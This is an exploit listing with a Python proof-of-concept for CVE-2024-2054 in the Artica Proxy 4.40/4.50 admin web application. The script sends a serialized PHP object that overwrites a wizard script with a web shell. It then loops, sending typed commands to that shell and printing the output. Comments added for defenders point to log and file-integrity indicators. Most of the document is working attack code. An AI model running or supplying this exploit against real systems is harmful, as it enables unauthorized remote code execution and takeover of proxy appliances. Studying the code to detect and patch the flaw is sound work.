Artica Proxy 4.50 - Remote Code Execution (RCE)

# Exploit Title: CVE-2024-2054 Artica-Proxy administrative web application insecure deserialization (RCE)
# Google Dork:
# Date: 23-04-2024
# Exploit Author: Madan
# Vendor Homepage: https://artica-proxy.com/
# Version: 4.40, 4.50
# Tested on: [relevant os]
# CVE : CVE-2024-2054

you can also find the exploit on my github repo:
https://github.com/Madan301/CVE-2024-2054


import requests
import base64
import urllib3
from colorama import Fore

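# Usage hint: the port of the administrative interface (9000 in the example)
# depends on how the appliance was deployed.
print(
    "Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might "
    "sometimes vary from how artica proxy interface is hosted"
)

URL = input("Enter url: ")
# Drop a single trailing slash so later path concatenation does not yield "//".
# endswith() also copes with empty input, where URL[-1] would raise IndexError.
ACTUAL_URL = URL[:-1] if URL.endswith("/") else URL

# Both names are kept because the rest of the script refers to each of them.
ARTICA_URL = ACTUAL_URL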

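def check(ARTICA_URL):
    """Report whether ``/wizard/wiz.upload.php`` answers with HTTP 200.

    Returns True on a 200 response and False otherwise, including when the
    host cannot be reached.

    NOTE(review): a 200 status only shows that the endpoint is reachable.
    It does not confirm the installed version or that the host is affected,
    so the "Vulnerable" message can be a false positive. Asset owners should
    compare the installed release with the affected versions listed in the
    header of this page (4.40, 4.50).
    """
    # verify=False turns off TLS certificate validation, so the peer is not
    # authenticated; the warning is silenced only to keep the output short.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    try:
        # A timeout keeps the probe from hanging on a filtered port.
        response = requests.get(
            ARTICA_URL + '/wizard/wiz.upload.php', verify=False, timeout=10
        )
    except requests.exceptions.RequestException:
        print(Fore.RED+"Could not reach, check URL")
        # Return here: the original fell through and read an unbound local.
        return False
    if response.status_code == 200:
        print(Fore.GREEN+"Vulnerable")
        return True
    print(Fore.RED+"Not Vulnerable")
    return False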


def exploit(ARTICA_URL):
    """Interactive request loop of the published PoC for CVE-2024-2054.

    The page header describes the issue as insecure deserialization in the
    Artica Proxy administrative web application (versions 4.40 and 4.50).

    Each iteration reads a command from stdin, sends ``payload_data`` in the
    ``build-js`` query parameter of ``/wizard/wiz.wizard.progress.php`` and,
    on HTTP 200, requests ``/wizard/wiz.upload.php`` with the command in the
    ``cmd`` query parameter and prints the response body. The loop has no
    exit condition, so the function never returns.

    Detection notes for defenders, taken from the requests built below:
      * web access logs showing ``/wizard/wiz.wizard.progress.php`` with a
        ``build-js`` parameter, especially one containing the base64 text
        used as the outer key of ``payload_data``;
      * requests to ``/wizard/wiz.upload.php`` carrying a ``cmd`` parameter;
      * unexpected changes to the ``cache_file`` path named below
        (file-integrity monitoring on the wizard directory).
    Limiting access to the administrative interface to trusted management
    networks reduces exposure; this page does not name a fixed release.
    """

    # Base64 of a PHP one-liner that passes the `cmd` query parameter to
    # system(), i.e. a minimal web shell. It is used as a key of cache_data.
    payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
    payload_data = {
        # The outer key is base64 text; it decodes to the start of a PHP
        # serialized-object header naming the class Net_DNS2_Cache_File.
        # Being a fixed string, it is a usable match for request inspection.
        "TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
            # Path of an existing wizard script on the appliance; the same
            # file is requested by check() and by the `cmd` request below.
            "cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
            "cache_serializer": "json",
            "cache_size": 999999999,
            "cache_data": {
                payload: {
                    "cache_date": 0,
                    "ttl": 999999999
                }
            }
        }
    }


    while True:
        PAYLOAD_CMD = input("enter command: ")
        # The f-string interpolates the dict's Python string form into the
        # query string of the first request.
        url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
        # verify=False disables TLS certificate validation on every request;
        # the repeated disable_warnings() calls only silence the warning.
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        response = requests.get(url, verify=False)
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        # Only the HTTP status of the first request is inspected here.
        if response.status_code == 200:
            # Second request: the operator's input goes into the `cmd`
            # parameter of wiz.upload.php and the body is printed as-is.
            cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
            cmd_response = requests.get(cmd_url, verify=False)
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
            print(cmd_response.text)
        else:
            print("Failed to execute the payload")

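# The interactive loop is entered only when the probe reported HTTP 200.
# The result gets its own name so the check() function is not overwritten.
is_reachable = check(ARTICA_URL=ACTUAL_URL)
if is_reachable:
    exploit(ARTICA_URL=ARTICA_URL)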
 